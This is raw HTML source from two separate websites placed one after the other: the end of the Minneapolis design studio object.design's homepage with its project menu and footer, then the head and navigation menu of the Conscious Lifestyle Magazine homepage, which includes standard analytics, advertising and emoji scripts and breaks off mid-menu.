class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_twins.jpg' src='https://object.design/content/uploads/2018/08/object_menu_twins-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_twins.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/dyrdek/'> <span class='link-index'>03</span> <div class='link-title'> <span class='link-title__text'>Rob Dyrdek</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_dyrdek.jpg' src='https://object.design/content/uploads/2018/08/object_menu_dyrdek-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_dyrdek.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/northland/'> <span class='link-index'>04</span> <div class='link-title'> <span class='link-title__text'>Northland</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2019/03/menutile_northland.jpg' src='https://object.design/content/uploads/2019/03/menutile_northland-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2019/03/menutile_northland.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/cargill-propricing/'> <span class='link-index'>05</span> <div class='link-title'> <span class='link-title__text'>Cargill ProPricing</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_propricing.jpg' src='https://object.design/content/uploads/2018/08/object_menu_propricing-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_propricing.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/pioneers/'> <span class='link-index'>06</span> <div class='link-title'> <span class='link-title__text'>Northland Pioneers</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2019/03/menutile_pioneers7.jpg' src='https://object.design/content/uploads/2019/03/menutile_pioneers7-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2019/03/menutile_pioneers7.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/unitedhealthcare/'> <span class='link-index'>07</span> <div class='link-title'> <span class='link-title__text'>UnitedHealthcare</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_uhc.jpg' src='https://object.design/content/uploads/2018/08/object_menu_uhc-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_uhc.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/momentous/'> <span class='link-index'>08</span> <div class='link-title'> <span class='link-title__text'>Momentous</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_momentous.jpg' src='https://object.design/content/uploads/2018/08/object_menu_momentous-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_momentous.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/football-as-football/'> <span class='link-index'>09</span> <div class='link-title'> <span class='link-title__text'>Football As Football</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_fasf.jpg' src='https://object.design/content/uploads/2018/08/object_menu_fasf-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_fasf.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/dibs/'> <span class='link-index'>10</span> <div class='link-title'> <span class='link-title__text'>Dibs</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_dibs.jpg' src='https://object.design/content/uploads/2018/08/object_menu_dibs-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_dibs.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/beatbox/'> <span class='link-index'>11</span> <div class='link-title'> <span class='link-title__text'>BeatBox Beverages</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_beatbox.jpg' src='https://object.design/content/uploads/2018/08/object_menu_beatbox-150x150.jpg' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_beatbox.jpg' /></noscript> </a></li> <li> <a href='https://object.design/work/identities/'> <span class='link-index'>12</span> <div class='link-title'> <span class='link-title__text'>Identities</span> </div> <img class='lazy' data-src='https://object.design/content/uploads/2018/08/object_menu_identities.gif' src='https://object.design/content/uploads/2018/08/object_menu_identities-150x150.gif' /> <noscript><img src='https://object.design/content/uploads/2018/08/object_menu_identities.gif' /></noscript> </a></li> </ul></div> </nav><!-- #work-navigation --> </section> <main id="main" class="site-main" role="main"> <article> <section class="page-component__hero_component none none fade-elements-from-below no_top_margin no_bottom_margin none none full-screen"> <div class='page-component__hero_component__content gsap-pinnable'> <div class="page-component__hero_component__content__content--large full-bleed align-left" style=" --page-text-color:#0000ff; --element-background-color:#00ff79;" > <div class="image-underlay"> <picture> <source media="(max-width: 800px)" srcset="https://object.design/content/uploads/2018/08/bghome_mobile_wires_green.png"> <source media="(max-width: 1200px)" srcset="https://object.design/content/uploads/2018/08/bghome_wires_green_desktop.png"> <!-- <img class="lazy" data-src="--><!--" src="--><!--"--> <img class="gsap-element" data-src="https://object.design/content/uploads/2018/08/bghome_wires_green_desktop.png" src="https://object.design/content/uploads/2018/08/bghome_wires_green_desktop.png" alt=""> <noscript>><img src="https://object.design/content/uploads/2018/08/bghome_wires_green_desktop.png" alt=""></noscript> </picture> </div> <h3 class="gsap-element page-component__hero_component__content__content__copy over-image" >We’re a design & technology studio based in Minneapolis.</h3> </div> </div> </section> <section class="page-component__feature_list_component none none fade-elements-from-below no_bottom_margin none none"> <div class='page-component__feature_list_component__content gsap-pinnable'><span class="page-component__rule--leading heavy"></span><a class="section-anchor" name="projects" ></a><span class="section-label">Featured Projects</span> <div class="page-component__feature_list_component__content__content--large"> <div class="page-component__feature_list_component__content__content__wrapper"> <ul class=""> <li class="gsap-element"> <a href="http://object.design/work/pioneers/" target="" >Northland Pioneers</a> </li> <li class="gsap-element"> <a href="https://object.design/work/misfit/" target="" >Misfit</a> </li> <li class="gsap-element"> <a href="http://object.design/work/dyrdek/" target="" >Rob Dyrdek</a> </li> <li class="gsap-element"> <a href="https://object.design/work/twins/" target="" >Minnesota Twins</a> </li> </ul></nav> </div> </div> <!-- <span class="page-component__text_component__subhead">--><!--</span>--> <!-- <p class="page-component__text_component__copy">--><!--</p>--> </div> </section> <section class="page-component__feature_list_component none none fade-elements-from-below no_top_margin no_bottom_margin none none"> <div class='page-component__feature_list_component__content gsap-pinnable'><span class="page-component__rule--leading"></span><a class="section-anchor" name="about" ></a><span class="section-label">About Object</span> <div class="page-component__feature_list_component__content__content--large"> <div class="page-component__feature_list_component__content__content__wrapper"> <ul class=""> <li class="gsap-element"> <a href="https://object.design/us/" target="" >Us</a> </li> <li class="gsap-element"> <a href="https://object.design/skills/" target="" >Skills</a> </li> <li class="gsap-element"> <a href="https://object.design/stuff/" target="" >Stuff</a> </li> <li class="gsap-element"> <a href="https://object.design/contact/" target="" >Contact</a> </li> </ul></nav> </div> </div> <!-- <span class="page-component__text_component__subhead">--><!--</span>--> <!-- <p class="page-component__text_component__copy">--><!--</p>--> </div> </section> </article> </main><!-- #main --> <footer id="colophon" class="site-footer" role="contentinfo" itemscope="itemscope" itemtype="http://schema.org/WPFooter"> <div class="site-footer__content"> <span class="site-footer__content__copyright">&copy; 2019</span> <a href="mailto:[email protected]" class="site-footer__content__contact">[email protected]</a> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src='https://object.design/content/themes/object_baseline_parent_theme/assets/js/production-min.js?ver=1556730053'></script> <script type='text/javascript' src='https://object.design/content/themes/object_baseline_child/assets/js/production-min.js?ver=4.9.4'></script> <script type='text/javascript' src='https://object.design/core/wp-includes/js/wp-embed.min.js?ver=4.9.4'></script> </body> </html>
0
<!DOCTYPE html><html lang=en-US prefix="og: http://ogp.me/ns#"><head><title>Conscious Lifestyle Magazine | The Mind Body Spirit Magazine, Evolved.</title><meta charset=UTF-8><meta name=viewport content="width=device-width, user-scalable=no, initial-scale=1, maximum-scale=1"><link rel=pingback href=https://www.consciouslifestylemag.com/xmlrpc.php><link rel="shortcut icon" href=https://www.consciouslifestylemag.com/wp-content/uploads/2017/08/clm-favicon.png> <script></script> <script>writeCookie();function writeCookie() {the_cookie=document.cookie;if(the_cookie){if(window.devicePixelRatio>=2){the_cookie="pixel_ratio="+window.devicePixelRatio+";"+the_cookie;document.cookie=the_cookie;}}}</script> <meta name=description content="Conscious Lifestyle Magazine blends artful and intelligent coverage of mind body spirit culture with life-changing articles from leading conscious thinkers"><link rel=canonical href=https://www.consciouslifestylemag.com/><meta property=og:locale content=en_US><meta property=og:type content=website><meta property=og:title content="Conscious Lifestyle Magazine: Your Guide to Creating an Enlightened Life"><meta property=og:description content="Discover everything you need to thrive, all in one place. The world&#039;s leading conscious teachers share powerful wisdom for creating an outrageously fulfilling, prosperous, healthy life."><meta property=og:url content=https://www.consciouslifestylemag.com/><meta property=og:image content=https://www.consciouslifestylemag.com/wp-content/uploads/2015/03/Conscious-Lifestyle-Summer-2015.jpg><meta property=og:image:secure_url content=https://www.consciouslifestylemag.com/wp-content/uploads/2015/03/Conscious-Lifestyle-Summer-2015.jpg><meta property=og:image:width content=1702><meta property=og:image:height content=630><meta property=og:image:alt content="Conscious Lifestyle Summer 2015"><meta name=twitter:card content=summary><meta name=twitter:description content="Conscious Lifestyle Magazine blends artful and intelligent coverage of mind body spirit culture with life-changing articles from leading conscious thinkers"><meta name=twitter:title content="Conscious Lifestyle Magazine: Your Guide to Creating an Enlightened Life"><meta name=twitter:image content=https://www.consciouslifestylemag.com/wp-content/uploads/2015/03/Conscious-Lifestyle-Summer-2015.jpg> <script type=application/ld+json>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.consciouslifestylemag.com/#website","url":"https://www.consciouslifestylemag.com/","name":"","potentialAction":{"@type":"SearchAction","target":"https://www.consciouslifestylemag.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type=application/ld+json>{"@context":"https://schema.org","@type":"Organization","url":"https://www.consciouslifestylemag.com/","sameAs":[],"@id":"https://www.consciouslifestylemag.com/#organization","name":"Conscious Lifestyle Magazine","logo":"https://www.consciouslifestylemag.com/wp-content/uploads/2017/11/Conscious-Lifestyle-Magazine-Logo-Retina-5-1a.jpg"}</script> <link rel=dns-prefetch href=//netdna.bootstrapcdn.com><link rel=dns-prefetch href=//s.w.org><link rel=alternate type=application/rss+xml title=" &raquo; Feed" href=https://www.consciouslifestylemag.com/feed/><link rel=alternate type=application/rss+xml title=" &raquo; Comments Feed" href=https://www.consciouslifestylemag.com/comments/feed/><link rel=alternate type=application/rss+xml title=" &raquo; Home (No Slider) Comments Feed" href=https://www.consciouslifestylemag.com/home-no-slider-2/feed/> <script>window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.consciouslifestylemag.com\/wp-includes\/js\/wp-emoji-release.min.js"}};!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style>img.wp-smiley,img.emoji{display:inline !important;border:none !important;box-shadow:none !important;height:1em !important;width:1em !important;margin:0 .07em !important;vertical-align:-0.1em !important;background:none !important;padding:0 !important}</style><link rel=stylesheet href=https://www.consciouslifestylemag.com/wp-content/cache/minify/a67fc.css media=all><link rel=stylesheet id=custom-css-css href=https://www.consciouslifestylemag.com/wp-content/themes/supreme/css/custom-styles.css.php type=text/css media=screen><link rel=stylesheet href=https://www.consciouslifestylemag.com/wp-content/cache/minify/d9d9b.css media=all> <script async src=https://www.consciouslifestylemag.com/wp-content/cache/minify/99ec4.js></script> <script>var love_it_vars={"ajaxurl":"https:\/\/www.consciouslifestylemag.com\/wp-admin\/admin-ajax.php","nonce":"eaa15874fa","already_loved_message":"You have already loved this item.","error_message":"Sorry, there was a problem processing your request.","logged_in":"false"};</script> <script async src=https://www.consciouslifestylemag.com/wp-content/cache/minify/416ea.js></script> <link rel=https://api.w.org/ href=https://www.consciouslifestylemag.com/wp-json/><link rel=shortlink href=https://www.consciouslifestylemag.com/><link rel=alternate type=application/json+oembed href="https://www.consciouslifestylemag.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.consciouslifestylemag.com%2F"><link rel=alternate type=text/xml+oembed href="https://www.consciouslifestylemag.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.consciouslifestylemag.com%2F&#038;format=xml"> <script type=application/ld+json>{"@context":"https:\/\/schema.org","@graph":[{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Subscribe","url":"https:\/\/www.consciouslifestylemag.com\/subscribe?campname=subscribe&#038;camplink=nav-menu"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Shop","url":"https:\/\/www.consciouslifestylestore.com?campname=clmstore&#038;camplink=nav-menu"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Past Issues","url":"https:\/\/www.consciouslifestylemag.com\/back-issues\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Mind","url":"https:\/\/www.consciouslifestylemag.com\/category\/mind\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Mindfulness","url":"https:\/\/www.consciouslifestylemag.com\/category\/mindfulness\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Meditation","url":"https:\/\/www.consciouslifestylemag.com\/category\/meditation\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Body","url":"https:\/\/www.consciouslifestylemag.com\/category\/body\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Yoga","url":"https:\/\/www.consciouslifestylemag.com\/category\/yoga\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Relationships","url":"https:\/\/www.consciouslifestylemag.com\/category\/relationships\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Spirit","url":"https:\/\/www.consciouslifestylemag.com\/category\/spirituality\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Without Limits","url":"https:\/\/www.consciouslifestylemag.com\/category\/without-limits\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Consciousness","url":"https:\/\/www.consciouslifestylemag.com\/category\/consciousness\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Conscious Culture","url":"https:\/\/www.consciouslifestylemag.com\/category\/conscious-culture\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Art","url":"https:\/\/www.consciouslifestylemag.com\/category\/art\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Music","url":"https:\/\/www.consciouslifestylemag.com\/category\/music\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Travel","url":"https:\/\/www.consciouslifestylemag.com\/category\/conscious-travel\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Events","url":"https:\/\/www.consciouslifestylemag.com\/category\/events\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Health","url":"https:\/\/www.consciouslifestylemag.com\/category\/holistic-health\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Healthy Recipes","url":"https:\/\/www.consciouslifestylemag.com\/category\/healthy-recipes\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Superfoods","url":"https:\/\/www.consciouslifestylemag.com\/category\/superfoods\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Ayurveda","url":"https:\/\/www.consciouslifestylemag.com\/category\/ayurveda\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Eco","url":"https:\/\/www.consciouslifestylemag.com\/category\/eco\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Humanitarianism","url":"https:\/\/www.consciouslifestylemag.com\/category\/humanitarianism\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Contributors","url":"https:\/\/www.consciouslifestylemag.com\/contributors\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Contact Us","url":"https:\/\/www.consciouslifestylemag.com\/contact-us\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"About Us","url":"https:\/\/www.consciouslifestylemag.com\/about-us-2\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Privacy Policy","url":"https:\/\/www.consciouslifestylemag.com\/privacy-policy\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Terms","url":"https:\/\/www.consciouslifestylemag.com\/terms-and-conditions\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Advertise","url":"https:\/\/www.consciouslifestylemag.com\/advertise\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Support","url":"https:\/\/www.consciouslifestylemag.com\/support\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Issue Archive","url":"https:\/\/www.consciouslifestylemag.com\/members\/issue-archive\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"My Account","url":"https:\/\/www.consciouslifestylemag.com\/members\/customer_center\/"}]}</script><meta name=google-site-verification content=eq6YDCxMHLH9kAHACIBcsMytbH-nSAVyZ_r4yIMUOxs><style>.cpw-date{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style>.cpw-date{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style>a.cpw-title{font-weight:normal !important;font-size:18px !important;font-family:'futurabold',Arial,Helvetica,Tahoma,sans-serif !important;color:#333 !important}img.cpw-thumbnail{padding-top:0px !important}.cpw-post-info{margin-top:-4px;margin-bottom:26px !important}</style><style>.cpw-date{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style>.cpw-date{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(http://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style>a.cpw-title{font-weight:normal !important;font-size:18px !important;font-family:'futurabold',Arial,Helvetica,Tahoma,sans-serif !important;color:#333 !important}img.cpw-thumbnail{padding-top:0px !important}.cpw-post-info{margin-top:-4px;margin-bottom:26px !important}</style><style>.cpw-date{background:url(https://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(https://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style>.cpw-date{background:url(https://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(https://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style>.cpw-date{background:url(https://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/date.png) no-repeat scroll 0 0 transparent}.cpw-comments{background:url(https://www.consciouslifestylemag.com/wp-content/plugins/custom-posts-widget/img/comments.png) no-repeat scroll 0 0 transparent}</style><style id=wp-custom-css>@media only screen and (max-width: 1000px){.full_bg_subscribe{min-height:460px;height:auto !important;background-size:cover !important}}.moonray-form{margin:0 auto}@media only screen and (max-width: 1000px){.ontraport_grid_offer .grid-summary-coupon-input .ussr-form-input{width:97px !important;height:auto !important}}@media only screen and (max-width: 600px){.ussr-grid-wrapper{min-width:unset !important;padding:0 !important}.moonray-form-p2c23620f2 .moonray-form-element-wrapper{padding:0 !important}.ussr-grid-wrapper{min-width:unset !important}.ontraport_grid_offer .grid-summary{width:99% !important}.moonray-form-error-message.moonray-form-state-error{display:none}}ul#menu-top-bar-menu>li:nth-of-type(1n+9){}#menu-item-14399,#menu-item-14400,#menu-item-14401,#menu-item-14402,#menu-item-14403,#menu-item-14404,#menu-item-14405,#menu-item-14406,#menu-item-14407,#menu-item-14408,#menu-item-14409,#menu-item-14410,#menu-item-14411,#menu-item-14412,#menu-item-14413,#menu-item-14414,#menu-item-14415,#menu-item-14416,#menu-item-14417,#menu-item-14418,#menu-item-14419,#menu-item-14420,#menu-item-14421,#menu-item-14422{display:none}@media only screen and (max-width: 767px){nav#mobile-navigation{display:none}}nav#mobile-top-bar-menu{margin:25px 10% 8px}#menubar-controls a i.icon-search{padding:0}@media only screen and (max-width: 767px){#menubar-controls{display:none}}.ticker-wrapper .ticker-controls{display:none}a.cat-item{color:#000;background-color:transparent !important;text-transform:none;font-family:'futurabold',Arial,Helvetica,Tahoma,sans-serif;text-decoration:underline;font-size:85%;padding-left:0;padding-right:6px;font-weight:normal}#top-bar-menu{width:100%}#cycloneslider-home-page-slideshow-1 .cycle-slideshow{max-height:280px}.cycloneslider-template-standard{margin-bottom:20px;margin-top:21px}@media only screen and (max-width: 767px){#cycloneslider-home-page-slideshow-1 .cycle-slideshow{max-height:190px}.cycloneslider-template-standard{margin-bottom:0px;margin-top:16px}}#moonray_forms_711 input{max-width:100%}.wp-share-button{display:none}.page-id-8172 .cycloneslider-slide:first-child{position:relative !important}@media only screen and (max-width: 767px){.container{width:300px}.container .one.column, .container .one.columns, .container .two.columns, .container .three.columns, .container .four.columns, .container .five.columns, .container .six.columns, .container .seven.columns, .container .eight.columns, .container .nine.columns, .container .ten.columns, .container .eleven.columns, .container .twelve.columns, .container .thirteen.columns, .container .fourteen.columns, .container .fifteen.columns, .container .sixteen.columns, .container .one-third.column, .container .two-thirds.column{width:300px}.otp-ad-h3{clear:both}}.clm-ads-4{margin-bottom:10px !important}.category .page-content .ad{padding-bottom:15px}</style><meta name=google-site-verification content=9Oy4-A-lEDypfbH602VmmJ73Vs4auUq1M1jkiQrn19c><meta name=google-site-verification content=eq6YDCxMHLH9kAHACIBcsMytbH-nSAVyZ_r4yIMUOxs> <script>(function(){var _fbq=window._fbq||(window._fbq=[]);if(!_fbq.loaded){var fbds=document.createElement('script');fbds.async=true;fbds.src='//connect.facebook.net/en_US/fbds.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(fbds,s);_fbq.loaded=true;} _fbq.push(['addPixelId',"1416682181925025"]);})();window._fbq=window._fbq||[];window._fbq.push(["track","PixelInitialized",{}]);</script> <noscript><img height=1 width=1 border=0 alt style=display:none src="https://www.facebook.com/tr?id=1416682181925025&amp;ev=NoScript"></noscript><link rel=prefetch href=https://www.consciouslifestylemag.com/wp-content/uploads/futuralight.woff><link rel=prefetch href=https://www.consciouslifestylemag.com/wp-content/uploads/palatinolinotype_webfont.woff><link rel=prefetch href=https://www.consciouslifestylemag.com/wp-content/uploads/futurabold.woff><link rel=prefetch href=https://www.consciouslifestylemag.com/wp-content/uploads/palatinolinotype_italic_webfont.woff><link rel=prefetch href=https://www.consciouslifestylemag.com/wp-content/uploads/palatinolinotype_bold_webfont.woff> <script>var yieldlove_site_id="consciouslifestylemag.com";</script> <script src=//cdn-a.yieldlove.com/yieldlove-bidder.js?consciouslifestylemag.com></script> <script async=async src=https://www.googletagservices.com/tag/js/gpt.js></script> <script>var googletag=googletag||{};googletag.cmd=googletag.cmd||[];</script> <script>      window.setTimeout(function(){      if(typeof YLHH=="undefined"){           googletag.cmd.push(function(){          googletag.pubads().refresh();     });     window.yieldlove_prevent_autoload=true;      }},2000);</script> </head><body class="home page-template-default page page-id-8172 light wp-schema-pro-1.2.0"> <script async src=https://ws.sharethis.com/button/buttons.js></script> <script>stLight.options({publisher:"ur-72c8cf80-2647-2464-a894-abc33849d467",doNotHash:true,doNotCopy:true,hashAddressBar:false});</script> <noscript><div class=no-js-alert>Please enable JavaScript to view this website.</div></noscript><div id=top-bar class=boxed-layout><div class=container><nav id=top-bar-menu class="top-menu twelve columns clearfix"><div id=top-bar-date>May 16, 2019</div><div class=menu-top-bar-menu-container><ul id=menu-top-bar-menu class=menu><li id=menu-item-14399 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14399"><a href="https://www.consciouslifestylemag.com/subscribe?campname=subscribe&#038;camplink=nav-menu">Subscribe</a></li><li id=menu-item-15623 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15623"><a href="https://www.consciouslifestylestore.com?campname=clmstore&#038;camplink=nav-menu">Shop</a></li><li id=menu-item-14400 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14400"><a href=https://www.consciouslifestylemag.com/back-issues/>Past Issues</a></li><li id=menu-item-14402 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14402"><a href=https://www.consciouslifestylemag.com/category/mind/>Mind</a><ul class=sub-menu><li id=menu-item-14401 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14401"><a href=https://www.consciouslifestylemag.com/category/mindfulness/>Mindfulness</a></li><li id=menu-item-14403 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14403"><a href=https://www.consciouslifestylemag.com/category/meditation/>Meditation</a></li></ul></li><li id=menu-item-14404 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14404"><a href=https://www.consciouslifestylemag.com/category/body/>Body</a><ul class=sub-menu><li id=menu-item-14406 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14406"><a href=https://www.consciouslifestylemag.com/category/yoga/>Yoga</a></li><li id=menu-item-14405 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14405"><a href=https://www.consciouslifestylemag.com/category/relationships/>Relationships</a></li></ul></li><li id=menu-item-14408 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14408"><a href=https://www.consciouslifestylemag.com/category/spirituality/>Spirit</a><ul class=sub-menu><li id=menu-item-14409 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14409"><a href=https://www.consciouslifestylemag.com/category/without-limits/>Without Limits</a></li><li id=menu-item-14407 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14407"><a href=https://www.consciouslifestylemag.com/category/consciousness/>Consciousness</a></li></ul></li><li id=menu-item-14411 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-14411"><a href=https://www.consciouslifestylemag.com/category/conscious-culture/>Conscious Culture</a><ul class=sub-menu><li id=menu-item-14410 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14410"><a href=https://www.consciouslifestylemag.com/category/art/>Art</a></li><li id=menu-item-14414 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14414"><a href=https://www.consciouslifestylemag.com/category/music/>Music</a></li><li id=menu-item-14412 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14412"><a href=https://www.consciouslifestylemag.com/category/conscious-travel/>Travel</a></li><li id=menu-item-14413 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14413"><a href=https://www.consciouslifestylemag.com/category/events/>Events</a></li></ul></li><li id=menu-item-14417 class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children 